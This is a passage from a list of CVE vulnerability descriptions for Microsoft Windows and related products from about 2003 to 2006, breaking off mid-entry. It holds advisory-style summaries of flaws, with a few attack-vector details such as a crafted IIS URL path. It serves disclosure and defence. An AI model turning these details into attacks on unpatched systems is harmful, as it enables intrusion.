[CVE-2006-0143] Microsoft Windows Graphics Rendering Engine (GRE) allows remote attackers to corrupt memory and cause a denial of service (crash) via a WMF file containing (1) ExtCreateRegion or (2) ExtEscape function calls with arguments with inconsistent lengths. [CVE-2006-0032] Cross-site scripting (XSS) vulnerability in the Indexing Service in Microsoft Windows 2000, XP, and Server 2003, when the Encoding option is set to Auto Select, allows remote attackers to inject arbitrary web script or HTML via a UTF-7 encoded URL, which is injected into an error message whose charset is set to UTF-7. [CVE-2006-0025] Stack-based buffer overflow in Microsoft Windows Media Player 9 and 10 allows remote attackers to execute arbitrary code via a PNG image with a large chunk size. [CVE-2006-0023] Microsoft Windows XP SP1 and SP2 before August 2004, and possibly other operating systems and versions, uses insecure default ACLs that allow the Authenticated Users group to gain privileges by modifying critical configuration information for the (1) Simple Service Discovery Protocol (SSDP), (2) Universal Plug and Play Device Host (UPnP), (3) NetBT, (4) SCardSvr, (5) DHCP, and (6) DnsCache services, aka "Permissive Windows Services DACLs." NOTE: the NetBT, SCardSvr, DHCP, DnsCache already require privileged access to exploit. [CVE-2006-0021] Microsoft Windows XP SP1 and SP2, and Server 2003 up to SP1, allows remote attackers to cause a denial of service (hang) via an IGMP packet with an invalid IP option, aka the "IGMP v3 DoS Vulnerability." [CVE-2006-0020] An unspecified Microsoft WMF parsing application, as used in Internet Explorer 5.01 SP4 on Windows 2000 SP4, and 5.5 SP2 on Windows Millennium, and possibly other versions, allows attackers to cause a denial of service (crash) and possibly execute code via a crafted WMF file with a manipulated WMF header size, possibly involving an integer overflow, a different vulnerability than CVE-2005-4560, and aka "WMF Image Parsing Memory Corruption Vulnerability." [CVE-2006-0014] Buffer overflow in Microsoft Outlook Express 5.5 and 6 allows remote attackers to execute arbitrary code via a crafted Windows Address Book (WAB) file containing "certain Unicode strings" and modified length values. [CVE-2006-0012] Unspecified vulnerability in Windows Explorer in Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 SP1 allows remote attackers to execute arbitrary code via attack vectors involving COM objects and "crafted files and directories," aka the "Windows Shell Vulnerability." [CVE-2006-0010] Heap-based buffer overflow in T2EMBED.DLL in Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 up to SP1, Windows 98, and Windows ME allows remote attackers to execute arbitrary code via an e-mail message or web page with a crafted Embedded Open Type (EOT) web font that triggers the overflow during decompression. [CVE-2006-0008] The ShellAbout API call in Korean Input Method Editor (IME) in Korean versions of Microsoft Windows XP SP1 and SP2, Windows Server 2003 up to SP1, and Office 2003, allows local users to gain privileges by launching the "shell about dialog box" and clicking the "End-User License Agreement" link, which executes Notepad with the privileges of the program that displays the about box. [CVE-2006-0006] Heap-based buffer overflow in the bitmap processing routine in Microsoft Windows Media Player 7.1 on Windows 2000 SP4, Media Player 9 on Windows 2000 SP4 and XP SP1, and Media Player 10 on XP SP1 and SP2 allows remote attackers to execute arbitrary code via a crafted bitmap (.BMP) file that specifies a size of 0 but contains additional data. [CVE-2006-0005] Buffer overflow in the plug-in for Microsoft Windows Media Player (WMP) 9 and 10, when used in browsers other than Internet Explorer and set as the default application to handle media files, allows remote attackers to execute arbitrary code via HTML with an EMBED element containing a long src attribute. [CVE-2005-4717] Microsoft Internet Explorer 6.0 on Windows NT 4.0 SP6a, Windows 2000 SP4, Windows XP SP1, Windows XP SP2, and Windows Server 2003 SP1 allows remote attackers to cause a denial of service (client crash) via a certain combination of a malformed HTML file and a CSS file that triggers a null dereference, probably related to rendering of a DIV element that contains a malformed IMG tag, as demonstrated by IEcrash.htm and IEcrash.rar. [CVE-2005-4560] The Windows Graphical Device Interface library (GDI32.DLL) in Microsoft Windows allows remote attackers to execute arbitrary code via a Windows Metafile (WMF) format image with a crafted SETABORTPROC GDI Escape function call, related to the Windows Picture and Fax Viewer (SHIMGVW.DLL), a different vulnerability than CVE-2005-2123 and CVE-2005-2124, and as originally discovered in the wild on unionseek.com. [CVE-2005-4360] The URL parser in Microsoft Internet Information Services (IIS) 5.1 on Windows XP Professional SP2 allows remote attackers to execute arbitrary code via multiple requests to ".dll" followed by arguments such as "~0" through "~9", which causes ntdll.dll to produce a return value that is not correctly handled by IIS, as demonstrated using "/_vti_bin/.dll//~0". NOTE: the consequence was originally believed to be only a denial of service (application crash and reboot). [CVE-2005-4269] mshtml.dll in Microsoft Windows XP, Server 2003, and Internet Explorer 6.0 SP1 allows attackers to cause a denial of service (access violation) by causing mshtml.dll to process button-focus events at the same time that a document is reloading, as seen in Microsoft Office InfoPath 2003 by repeatedly clicking the "Delete" button in a repeating section in a form. NOTE: the normal operation of InfoPath appears to involve a local user without any privilege boundaries, so this might not be a vulnerability in InfoPath. If no realistic scenarios exist for this problem in other products, then perhaps it should be excluded from CVE. [CVE-2005-3981] * DISPUTED NOTE: this issue has been disputed by third parties. Microsoft Windows XP, 2000, and 2003 allows local users to kill a writable process by using the CreateRemoteThread function with certain arguments on a process that has been opened using the OpenProcess function, possibly involving an invalid address for the start routine. NOTE: followup posts have disputed this issue, saying that if a user already has privileges to write to a process, then other functions could be called or the process could be terminated using PROCESS_TERMINATE. [CVE-2005-3945] The SynAttackProtect protection in Microsoft Windows 2003 before SP1 and Windows 2000 before SP4 with Update Roll-up uses a hash of predictable data, which allows remote attackers to cause a denial of service (CPU consumption) via a flood of SYN packets that produce identical hash values, which slows down the hash table lookups. [CVE-2005-3595] By default Microsoft Windows XP Home Edition installs with a blank password for the Administrator account, which allows remote attackers to gain control of the computer. [CVE-2005-3177] CHKDSK in Microsoft Windows 2000 before Update Rollup 1 for SP4, Windows XP, and Windows Server 2003, when running in fix mode, does not properly handle security descriptors if the master file table contains a large number of files or if the descriptors do not satisfy certain NTFS conventions, which could cause ACLs for some files to be reverted to less secure defaults, or cause security descriptors to be removed. [CVE-2005-3176] Microsoft Windows 2000 before Update Rollup 1 for SP4 does not record the IP address of a Windows Terminal Services client in a security log event if the client connects successfully, which could make it easier for attackers to escape detection. [CVE-2005-3175] Microsoft Windows 2000 before Update Rollup 1 for SP4 allows a local administrator to unlock a computer even if it has been locked by a domain administrator, which allows the local administrator to access the session as the domain administrator. [CVE-2005-3174] Microsoft Windows 2000 before Update Rollup 1 for SP4 allows users to log on to the domain, even when their password has expired, if the fully qualified domain name (FQDN) is 8 characters long. [CVE-2005-3173] Microsoft Windows 2000 before Update Rollup 1 for SP4 does not apply group policies if the user logs on using UPN credentials with a trailing dot, which prevents Windows 2000 from finding the correct domain controller and could allow the user to bypass intended restrictions. [CVE-2005-3172] The WideCharToMultiByte function in Microsoft Windows 2000 before Update Rollup 1 for SP4 does not properly convert strings with Japanese composite characters in the last character, which could prevent the string from being null terminated and lead to data corruption or enable buffer overflow attacks. [CVE-2005-3171] Microsoft Windows 2000 before Update Rollup 1 for SP4 records Event ID 1704 to indicate that Group Policy security settings were successfully updated, even when the processing fails such as when Ntuser.pol cannot be accessed, which could cause system administrators to believe that the system is compliant with the specified settings. [CVE-2005-3170] The LDAP client on Microsoft Windows 2000 before Update Rollup 1 for SP4 accepts certificates using LDAP Secure Sockets Layer (LDAPS) even when the Certificate Authority (CA) is not trusted, which could allow attackers to trick users into believing that they are accessing a trusted site. [CVE-2005-3169] Microsoft Windows 2000 before Update Rollup 1 for SP4, when the "audit directory service access" policy is enabled, does not record a 565 event message for File Delete Child operations on an Active Directory object in the security event log, which could allow attackers to conduct unauthorized activities without detection. [CVE-2005-3168] The SECEDIT command on Microsoft Windows 2000 before Update Rollup 1 for SP4, when using a security template to set Access Control Lists (ACLs) on folders, does not apply ACLs on folders that are listed after a long folder entry, which could result in less secure permissions than specified by the template. [CVE-2005-2940] Unquoted Windows search path vulnerability in Microsoft Antispyware 1.0.509 (Beta 1) might allow local users to gain privileges via a malicious "program.exe" file in the C: folder, involving the programs (1) GIANTAntiSpywareMain.exe, (2) gcASNotice.exe, (3) gcasServ.exe, (4) gcasSWUpdater.exe, or (5) GIANTAntiSpywareUpdater.exe. NOTE: it is not clear whether this overlaps CVE-2005-2935. [CVE-2005-2935] Unquoted Windows search path vulnerability in Microsoft AntiSpyware might allow local users to execute code via a malicious c:\program.exe file, which is run by AntiSpywareMain.exe when it attempts to execute gsasDtServ.exe. NOTE: it is not clear whether this overlaps CVE-2005-2940. [CVE-2005-2388] Buffer overflow in a certain USB driver, as used on Microsoft Windows, allows attackers to execute arbitrary code. [CVE-2005-2307] netman.dll in Microsoft Windows Connections Manager Library allows local users to cause a denial of service (Network Connections Service crash) via a large integer argument to a particular function, aka "Network Connection Manager Vulnerability." [CVE-2005-2224] aspnet_wp.exe in Microsoft ASP.NET web services allows remote attackers to cause a denial of service (CPU consumption from infinite loop) via a crafted SOAP message to an RPC/Encoded method. [CVE-2005-2128] QUARTZ.DLL in Microsoft Windows Media Player 9 allows remote attackers to write a null byte to arbitrary memory via an AVI file with a crafted strn element with a modified length value. [CVE-2005-2122] Windows Shell for Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 allows remote attackers to execute arbitrary commands via a shortcut (.lnk) file with long font properties that lead to a buffer overflow in the Client/Server Runtime Server Subsystem (CSRSS), a different vulnerability than CVE-2005-2118. [CVE-2005-2120] Stack-based buffer overflow in the Plug and Play (PnP) service (UMPNPMGR.DLL) in Microsoft Windows 2000 SP4, and XP SP1 and SP2, allows remote or local authenticated attackers to execute arbitrary code via a large number of "\" (backslash) characters in a registry key name, which triggers the overflow in a wsprintfW function call. [CVE-2005-2118] Windows Shell for Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 allows remote user-assisted attackers to execute arbitrary commands via a crafted shortcut (.lnk) file with long font properties that lead to a buffer overflow when the user views the file's properties using Windows Explorer, a different vulnerability than CVE-2005-2122. [CVE-2005-2117] Web View in Windows Explorer on Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 does not properly handle certain HTML characters in preview fields, which allows remote user-assisted attackers to execute arbitrary code. [CVE-2005-1987] Buffer overflow in Collaboration Data Objects (CDO), as used in Microsoft Windows and Microsoft Exchange Server, allows remote attackers to execute arbitrary code when CDOSYS or CDOEX processes an e-mail message with a large header name, as demonstrated using the "Content-Type" string. [CVE-2005-1985] The Client Service for NetWare (CSNW) on Microsoft Windows 2000 SP4, XP SP1 and Sp2, and Server 2003 SP1 and earlier, allows remote attackers to execute arbitrary code due to an "unchecked buffer" when processing certain crafted network messages. [CVE-2005-1984] Buffer overflow in the Print Spooler service (Spoolsv.exe) for Microsoft Windows 2000, Windows XP, and Windows Server 2003 allows remote attackers to execute arbitrary code via a malicious message. [CVE-2005-1983] Stack-based buffer overflow in the Plug and Play (PnP) service for Microsoft Windows 2000 and Windows XP Service Pack 1 allows remote attackers to execute arbitrary code via a crafted packet, and local users to gain privileges via a malicious application, as exploited by the Zotob (aka Mytob) worm. [CVE-2005-1982] Unknown vulnerability in the PKINIT Protocol for Microsoft Windows 2000, Windows XP, and Windows Server 2003 could allow a local user to obtain information and spoof a server via a man-in-the-middle (MITM) attack between a client and a domain controller when PKINIT smart card authentication is being used. [CVE-2005-1981] Unknown vulnerability in Microsoft Windows 2000 Server and Windows Server 2003 domain controllers allows remote authenticated users to cause a denial of service (system crash) via a crafted Kerberos message. [CVE-2005-1980] Distributed Transaction Controller in Microsoft Windows allows remote servers to cause a denial of service (MSDTC service hang) via a crafted Transaction Internet Protocol (TIP) message that causes DTC to repeatedly connect to a target IP and port number after an error occurs, aka the "Distributed TIP Vulnerability." [CVE-2005-1979] Distributed Transaction Controller in Microsoft Windows allows remote servers to cause a denial of service (MSDTC service exception and exit) via an "unexpected protocol command during the reconnection request," which is not properly handled by the Transaction Internet Protocol (TIP) functionality. [CVE-2005-1978] COM+ in Microsoft Windows does not properly "create and use memory structures," which allows local users or remote attackers to execute arbitrary code. [CVE-2005-1793] User32.DLL in Microsoft Windows 98SE, and possibly other operating systems, allows local and remote attackers to cause a denial of service (crash) via an icon (.ico) bitmap file with large width and height values. [CVE-2005-1792] Memory leak in Windows Management Instrumentation (WMI) service allows attackers to cause a denial of service (memory consumption and crash) by creating security contexts more quickly than they can be cleared from the RPC cache. [CVE-2005-1219] Buffer overflow in the Microsoft Color Management Module for Windows allows remote attackers to execute arbitrary code via an image with crafted ICC profile format tags. [CVE-2005-1218] The Microsoft Windows kernel in Microsoft Windows 2000 Server, Windows XP, and Windows Server 2003 allows remote attackers to cause a denial of service (crash) via crafted Remote Desktop Protocol (RDP) requests. [CVE-2005-1208] Integer overflow in Microsoft Windows 98, 2000, XP SP2 and earlier, and Server 2003 SP1 and earlier allows remote attackers to execute arbitrary code via a crafted compiled Help (.CHM) file with a large size field that triggers a heap-based buffer overflow, as demonstrated using a "ms-its:" URL in Internet Explorer. [CVE-2005-1207] Buffer overflow in the Web Client service in Microsoft Windows XP and Windows Server 2003 allows remote authenticated users to execute arbitrary code via a crafted WebDAV request containing special parameters. [CVE-2005-1206] Buffer overflow in the Server Message Block (SMB) functionality for Microsoft Windows 2000, XP SP1 and SP2, and Server 2003 and SP1 allows remote attackers to execute arbitrary code via unknown vectors, aka the "Server Message Block Vulnerability." [CVE-2005-1205] The Telnet client for Microsoft Windows XP, Windows Server 2003, and Windows Services for UNIX allows remote attackers to read sensitive environment variables via the NEW-ENVIRON option with a SEND ENV_USERVAR command. [CVE-2005-0852] Microsoft Windows XP SP1 allows local users to cause a denial of service (system crash) via an empty datagram to a raw IP over IP socket (IP protocol 4), as originally demonstrated using code in Python 2.3. [CVE-2005-0771] VERITAS Backup Exec Server (beserver.exe) 9.0 through 10.0 for Windows allows remote unauthenticated attackers to modify the registry by calling methods to the RPC interface on TCP port 6106. [CVE-2005-0551] Stack-based buffer overflow in WINSRV.DLL in the Client Server Runtime System (CSRSS) process of Microsoft Windows 2000, Windows XP SP1 and SP2, and Windows Server 2003 allows local users to gain privileges via a specially-designed application that provides console window information with a long FaceName value. [CVE-2005-0550] Buffer overflow in Microsoft Windows 2000, Windows XP SP1 and SP2, and Windows Server 2003 allows local users to cause a denial of service (i.e., system crash) via a malformed request, aka "Object Management Vulnerability". [CVE-2005-0545] Microsoft Windows XP Pro SP2 and Windows 2000 Server SP4 running Active Directory allow local users to bypass group policies that restrict access to hidden drives by using the browse feature in Office 10 applications such as Word or Excel, or using a flash drive. NOTE: this issue has been disputed in a followup post. [CVE-2005-0063] The document processing application used by the Windows Shell in Microsoft Windows 2000, Windows XP, and Windows Server 2003 allows remote attackers to execute arbitrary code by modifying the CLSID stored in a file so that it is processed by HTML Application Host (MSHTA), as demonstrated using a Microsoft Word document. [CVE-2005-0061] The kernel of Microsoft Windows 2000, Windows XP SP1 and SP2, and Windows Server 2003 allows local users to gain privileges via certain access requests. [CVE-2005-0060] Buffer overflow in the font processing component of Microsoft Windows 2000, Windows XP SP1 and SP2, and Windows Server 2003 allows local users to gain privileges via a specially-designed application. [CVE-2005-0059] Buffer overflow in the Message Queuing component of Microsoft Windows 2000 and Windows XP SP1 allows remote attackers to execute arbitrary code via a crafted message. [CVE-2005-0058] Buffer overflow in the Telephony Application Programming Interface (TAPI) for Microsoft Windows 98, Windows 98 SE, Windows ME, Windows 2000, Windows XP, and Windows Server 2003 allows attackers elevate privileges or execute arbitrary code via a crafted message. [CVE-2005-0048] Microsoft Windows XP SP2 and earlier, 2000 SP3 and SP4, Server 2003, and older operating systems allows remote attackers to cause a denial of service and possibly execute arbitrary code via crafted IP packets with malformed options, aka the "IP Validation Vulnerability." [CVE-2004-2527] The local and remote desktop login screens in Microsoft Windows XP before SP2 and 2003 allow remote attackers to cause a denial of service (CPU and memory consumption) by repeatedly using the WinKey+"U" key combination, which causes multiple copies of Windows Utility Manager to be loaded more quickly than they can be closed when the copies detect that another instance is running. [CVE-2004-2454] aMSN 0.90 for Microsoft Windows allows local users to obtain sensitive information such as hashed passwords from (1) hotlog.htm and (2) config.xml. [CVE-2004-2365] Memory leak in Microsoft Windows XP and Windows Server 2003 allows local users to cause a denial of service (memory exhaustion) by repeatedly creating and deleting directories using a non-standard tool such as smbmount. [CVE-2004-2339] DISPUTED ** Microsoft Windows 2000, XP, and possibly 2003 allows local users with the SeDebugPrivilege privilege to execute arbitrary code as kernel and read or write kernel memory via the NtSystemDebugControl function, which does not verify its pointer arguments. Note: this issue has been disputed, since Administrator privileges are typically required to exploit this issue, thus privilege boundaries are not crossed. [CVE-2004-2307] Microsoft Internet Explorer 6.0.2600 on Windows XP allows remote attackers to cause a denial of service (browser crash) via a shell: URI with double backslashes (\\) in an HTML tag such as IFRAME or A. [CVE-2004-2291] Microsoft Windows Internet Explorer 5.5 and 6.0 allows remote attackers to execute arbitrary code via an embedded script that uses Shell Helper objects and a shortcut (link) to execute the target script. [CVE-2004-2290] Microsoft Windows XP Explorer allows attackers to execute arbitrary code via a HTML and script in a self-executing folder that references an executable file within the folder, which is automatically executed when a user accesses the folder. [CVE-2004-2289] Microsoft Windows XP Explorer allows local users to execute arbitrary code via a system folder with a Desktop.ini file containing a .ShellClassInfo specifier with a CLSID value that is associated with an executable file. [CVE-2004-2176] The Internet Connection Firewall (ICF) in Microsoft Windows XP SP2 is configured by default to trust sessmgr.exe, which allows local users to use sessmgr.exe to create a local listening port that bypasses the ICF access controls. [CVE-2004-1889] Unknown vulnerability in ftpd in SGI IRIX 6.5.20 through 6.5.23 allows remote attackers to cause a denial of service (hang) via a link failure with Microsoft Windows. [CVE-2004-1325] The getItemInfoByAtom function in the ActiveX control for Microsoft Windows Media Player 9.0 returns a 0 if the file does not exist and the size of the file if the file exists, which allows remote attackers to determine the existence of files on the local system. [CVE-2004-1324] The Microsoft Windows Media Player 9.0 ActiveX control may allow remote attackers to execute arbitrary web script in the Local computer zone via the (1) artist or (2) song fields of a music file, if the file is processed using Internet Explorer. [CVE-2004-1080] The WINS service (wins.exe) on Microsoft Windows NT Server 4.0, Windows 2000 Server, and Windows Server 2003 allows remote attackers to write to arbitrary memory locations and possibly execute arbitrary code via a modified memory pointer in a WINS replication packet to TCP port 42, aka the "Association Context Vulnerability." [CVE-2004-1049] Integer overflow in the LoadImage API of the USER32 Lib for Microsoft Windows allows remote attackers to execute arbitrary code via a .bmp, .cur, .ico or .ani file with a large image size field, which leads to a buffer overflow, aka the "Cursor and Icon Format Handling Vulnerability." [CVE-2004-0901] Microsoft Word for Windows 6.0 Converter (MSWRD632.WPC), as used in WordPad, does not properly validate certain data lengths, which allows remote attackers to execute arbitrary code via a .wri, .rtf, and .doc file sent by email or malicious web site, aka "Font Conversion Vulnerability," a different vulnerability than CVE-2004-0571. [CVE-2004-0900] The DHCP Server service for Microsoft Windows NT 4.0 Server and Terminal Server Edition does not properly validate the length of certain messages, which allows remote attackers to execute arbitrary code via a malformed DHCP message, aka the "DHCP Request Vulnerability." [CVE-2004-0899] The DHCP Server service for Microsoft Windows NT 4.0 Server and Terminal Server Edition, with DHCP logging enabled, does not properly validate the length of certain messages, which allows remote attackers to cause a denial of service (application crash) via a malformed DHCP message, aka "Logging Vulnerability." [CVE-2004-0897] The Indexing Service for Microsoft Windows XP and Server 2003 does not properly validate the length of a message, which allows remote attackers to execute arbitrary code via a buffer overflow attack. [CVE-2004-0840] The SMTP (Simple Mail Transfer Protocol) component of Microsoft Windows XP 64-bit Edition, Windows Server 2003, Windows Server 2003 64-bit Edition, and the Exchange Routing Engine component of Exchange Server 2003, allows remote attackers to execute arbitrary code via a malicious DNS response message containing length values that are not properly validated. [CVE-2004-0727] Microsoft Internet Explorer 6.0.2800.1106 on Microsoft Windows XP SP2, and other versions including 5.01 and 5.5, allows remote web servers to bypass zone restrictions and execute arbitrary code in the local computer zone by redirecting a function to another function with the same name, as demonstrated by SimilarMethodNameRedir, aka the "Similar Method Name Redirection Cross Domain Vulnerability." [CVE-2004-0726] The Windows Media Player control in Microsoft Windows 2000 allows remote attackers to execute arbitrary script in the local computer zone via an ASX filename that contains javascript, which is executed in the local context in a preview panel. [CVE-2004-0575] Integer overflow in DUNZIP32.DLL for Microsoft Windows XP, Windows XP 64-bit Edition, Windows Server 2003, and Windows Server 2003 64-bit Edition allows remote attackers to execute arbitrary code via compressed (zipped) folders that involve an "unchecked buffer" and improper length validation. [CVE-2004-0574] The Network News Transfer Protocol (NNTP) component of Microsoft Windows NT Server 4.0, Windows 2000 Server, Windows Server 2003, Exchange 2000 Server, and Exchange Server 2003 allows remote attackers to execute arbitrary code via XPAT patterns, possibly related to improper length validation and an "unchecked buffer," leading to off-by-one and heap-based buffer overflows. [CVE-2004-0572] Buffer overflow in the Windows Program Group Converter (grpconv.exe) may allow remote attackers to execute arbitrary code via a shell: URL with a long filename and a .grp extension, which is not properly handled when the shell capability launches grpconv.exe. [CVE-2004-0571] Microsoft Word for Windows 6.0 Converter does not properly validate certain data lengths, which allows remote attackers to execute arbitrary code via a .wri, .rtf, and .doc file sent by email or malicious web site, aka "Table Conversion Vulnerability," a different vulnerability than CVE-2004-0901. [CVE-2004-0540] Microsoft Windows 2000, when running in a domain whose Fully Qualified Domain Name (FQDN) is exactly 8 characters long, does not prevent users with expired passwords from logging on to the domain. [CVE-2004-0503] Microsoft Outlook 2003 allows remote attackers to bypass the default zone restrictions and execute script within media files via a Rich Text Format (RTF) message containing an OLE object for the Windows Media Player, which bypasses Media Player's setting to disallow scripting and may lead to unprompted installation of an executable when exploited in conjunction with predictable-file-location exposures such as CVE-2004-0502. [CVE-2004-0214] Buffer overflow in Microsoft Internet Explorer and Explorer on Windows XP SP1, WIndows 2000, Windows 98, and Windows Me may allow remote malicious servers to cause a denial of service (application crash) and possibly execute arbitrary code via long share names, as demonstrated using Samba. [CVE-2004-0211] The kernel for Microsoft Windows Server 2003 does not reset certain values in CPU data structures, which allows local users to cause a denial of service (system crash) via a malicious program. [CVE-2004-0210] The POSIX component of Microsoft Windows NT and Windows 2000 allows local users to execute arbitrary code via certain parameters, possibly by modifying message length values and causing a buffer overflow. [CVE-2004-0209] Unknown vulnerability in the Graphics Rendering Engine processes of Microsoft Windows 2000, Windows XP, and Windows Server 2003 allows remote attackers to execute arbitrary code via (1) Windows Metafile (WMF) or (2) Enhanced Metafile (EMF) image formats that involve "an unchecked buffer." [CVE-2004-0208] The Virtual DOS Machine (VDM) subsystem of Microsoft Windows NT 4.0, Windows 2000, Windows XP, and Windows Server 2003 allows local users to access kernel memory and gain privileges via a malicious program that modified some system structures in a way that is not properly validated by privileged operating system functions. [CVE-2004-0207] "Shatter" style vulnerability in the Window Management application programming interface (API) for Microsoft Windows 98, Windows NT 4.0, Windows 2000, Windows XP, and Windows Server 2003 allows local users to gain privileges by using certain API functions to change properties of privileged programs using the SetWindowLong and SetWIndowLongPtr API functions. [CVE-2004-0206] Network Dynamic Data Exchange (NetDDE) services for Microsoft Windows 98, Windows NT 4.0, Windows 2000, Windows XP, and Windows Server 2003 allows attackers to remotely execute arbitrary code or locally gain privileges via a malicious message or application that involves an "unchecked buffer," possibly a buffer overflow. [CVE-2004-0202] IDirectPlay4 Application Programming Interface (API) of Microsoft DirectPlay 7.0a thru 9.0b, as used in Windows Server 2003 and earlier allows remote attackers to cause a denial of service (application crash) via a malformed packet. [CVE-2004-0201] Heap-based buffer overflow in the HtmlHelp program (hh.exe) in HTML Help for Microsoft Windows 98, Me, NT 4.0, 2000, XP, and Server 2003 allows remote attackers to execute arbitrary commands via a .CHM file with a large length field, a different vulnerability than CVE-2003-1041. [CVE-2004-0199] Help and Support Center in Microsoft Windows XP and Windows Server 2003 SP1 does not properly validate HCP URLs, which allows remote attackers to execute arbitrary code, as demonstrated using certain hcp:// URLs that access the DVD Upgrade capability (dvdupgrd.htm). [CVE-2004-0120] The Microsoft Secure Sockets Layer (SSL) library, as used in Windows 2000, Windows XP, and Windows Server 2003, allows remote attackers to cause a denial of service via malformed SSL messages. [CVE-2003-1107] The DHTML capability in Microsoft Windows Media Player (WMP) 6.4, 7.0, 7.1, and 9 may run certain URL commands from a security zone that is less trusted than the current zone, which allows attackers to bypass intended access restrictions. [CVE-2003-1106] The SMTP service in Microsoft Windows 2000 before SP4 allows remote attackers to cause a denial of service (crash or hang) via an e-mail message with a malformed time stamp in the FILETIME attribute. [CVE-2003-0995] Buffer overflow in the Microsoft Message Queue Manager (MSQM) allows remote attackers to cause a denial of service (RPC service crash) via a queue registration request. [CVE-2003-0908] The Utility Manager in Microsoft Windows 2000 executes winhlp32.exe with system privileges, which allows local users to execute arbitrary code via a "Shatter" style attack using a Windows message that accesses the context sensitive help button in the GUI, as demonstrated using the File Open dialog in the Help window, a different vulnerability than CVE-2004-0213. [CVE-2003-0907] Help and Support Center in Microsoft Windows XP SP1 does not properly validate HCP URLs, which allows remote attackers to execute arbitrary code via quotation marks in an hcp:// URL, which are not quoted when constructing the argument list to HelpCtr.exe. [CVE-2003-0906] Buffer overflow in the rendering for (1) Windows Metafile (WMF) or (2) Enhanced Metafile (EMF) image formats in Microsoft Windows NT 4.0 SP6a, 2000 SP2 through SP4, and XP SP1 allows remote attackers to execute arbitrary code via a malformed WMF or EMF image. [CVE-2003-0839] Directory traversal vulnerability in the "Shell Folders" capability in Microsoft Windows Server 2003 allows remote attackers to read arbitrary files via .. (dot dot) sequences in a "shell:" link. [CVE-2003-0825] The Windows Internet Naming Service (WINS) for Microsoft Windows Server 2003, and possibly Windows NT and Server 2000, does not properly validate the length of certain packets, which allows attackers to cause a denial of service and possibly execute arbitrary code. [CVE-2003-0818] Multiple integer overflows in Microsoft ASN.1 library (MSASN1.DLL), as used in LSASS.EXE, CRYPT32.DLL, and other Microsoft executables and libraries on Windows NT 4.0, 2000, and XP, allow remote attackers to execute arbitrary code via ASN.1 BER encodings with (1) very large length fields that cause arbitrary heap data to be overwritten, or (2) modified bit strings. [CVE-2003-0813] A multi-threaded race condition in the Windows RPC DCOM functionality with the MS03-039 patch installed allows remote attackers to cause a denial of service (crash or reboot) by causing two threads to process the same RPC request, which causes one thread to use memory after it has been freed, a different vulnerability than CVE-2003-0352 (Blaster/Nachi), CVE-2003-0715, and CVE-2003-0528, and as demonstrated by certain exploits against those vulnerabilities. [CVE-2003-0812] Stack-based buffer overflow in a logging function for Windows Workstation Service (WKSSVC.DLL) allows remote attackers to execute arbitrary code via RPC calls that cause long entries to be written to a debug log file ("NetSetup.LOG"), as demonstrated using the NetAddAlternateComputerName API. [CVE-2003-0806] Buffer overflow in the Windows logon process (winlogon) in Microsoft Windows NT 4.0 SP6a, 2000 SP2 through SP4, and XP SP1, when a member of a domain, allows remote attackers to execute arbitrary code. [CVE-2003-0719] Buffer overflow in the Private Communications Transport (PCT) protocol implementation in the Microsoft SSL library, as used in Microsoft Windows NT 4.0 SP6a, 2000 SP2 through SP4, XP SP1, Server 2003, NetMeeting, Windows 98, and Windows ME, allows remote attackers to execute arbitrary code via PCT 1.0 handshake packets. [CVE-2003-0662] Buffer overflow in Troubleshooter ActiveX Control (Tshoot.ocx) in Microsoft Windows 2000 SP4 and earlier allows remote attackers to execute arbitrary code via an HTML document with a long argument to the RunQuery2 method. [CVE-2003-0660] The Authenticode capability in Microsoft Windows NT through Server 2003 does not prompt the user to download and install ActiveX controls when the system is low on memory, which could allow remote attackers execute arbitrary code without user approval. [CVE-2003-0605] The RPC DCOM interface in Windows 2000 SP3 and SP4 allows remote attackers to cause a denial of service (crash), and local attackers to use the DoS to hijack the epmapper pipe to gain privileges, via certain messages to the __RemoteGetClassObject interface that cause a NULL pointer to be passed to the PerformScmStage function. [CVE-2003-0604] Windows Media Player (WMP) 7 and 8, as running on Internet Explorer and possibly other Microsoft products that process HTML, allows remote attackers to bypass zone restrictions and access or execute arbitrary files via an IFRAME tag pointing to an ASF file whose Content-location contains a File:// URL. [CVE-2003-0533] Stack-based buffer overflow in certain Active Directory service functions in LSASRV.DLL of the Local Security Authority Subsystem Service (LSASS) in Microsoft Windows NT 4.0 SP6a, 2000 SP2 through SP4, XP SP1, Server 2003, NetMeeting, Windows 98, and Windows ME, allows remote attackers to execute arbitrary code via a packet that causes the DsRolerUpgradeDownlevelServer function to create long debug entries for the DCPROMO.LOG log file, as exploited by the Sasser worm. [CVE-2003-0496] Microsoft SQL Server before Windows 2000 SP4 allows local users to gain privileges as the SQL Server user by calling the xp_fileexist extended stored procedure with a named pipe as an argument instead of a normal file. [CVE-2003-0349] Buffer overflow in the streaming media component for logging multicast requests in the ISAPI for the logging capability of Microsoft Windows Media Services (nsiislog.dll), as installed in IIS 5.0, allows remote attackers to execute arbitrary code via a large POST request to nsiislog.dll. [CVE-2003-0348] A certain Microsoft Windows Media Player 9 Series ActiveX control allows remote attackers to view and manipulate the Media Library on the local system via HTML script. [CVE-2003-0346] Multiple integer overflows in a Microsoft Windows DirectX MIDI library (QUARTZ.DLL) allow remote attackers to execute arbitrary code via a MIDI (.mid) file with (1) large length for a Text or Copyright string, or (2) a large number of tracks, which leads to a heap-based buffer overflow. [CVE-2003-0345] Buffer overflow in the SMB capability for Microsoft Windows XP, 2000, and NT allows remote attackers to cause a denial of service and possibly execute arbitrary code via an SMB packet that specifies a smaller buffer length than is required. [CVE-2003-0228] Directory traversal vulnerability in Microsoft Windows Media Player 7.1 and Windows Media Player for Windows XP allows remote attackers to execute arbitrary code via a skins file with a URL containing hex-encoded backslash characters (%5C) that causes an executable to be placed in an arbitrary location. [CVE-2003-0227] The logging capability for unicast and multicast transmissions in the ISAPI extension for Microsoft Windows Media Services in Microsoft Windows NT 4.0 and 2000, nsiislog.dll, allows remote attackers to cause a denial of service in Internet Information Server (IIS) and execute arbitrary code via a certain network request. [CVE-2003-0111] The ByteCode Verifier component of Microsoft Virtual Machine (VM) build 5.0.3809 and earlier, as used in Windows and Internet Explorer, allows remote attackers to bypass security checks and execute arbitrary code via a malicious Java applet, aka "Flaw in Microsoft VM Could Enable System Compromise." [CVE-2003-0109] Buffer overflow in ntdll.dll on Microsoft Windows NT 4.0, Windows NT 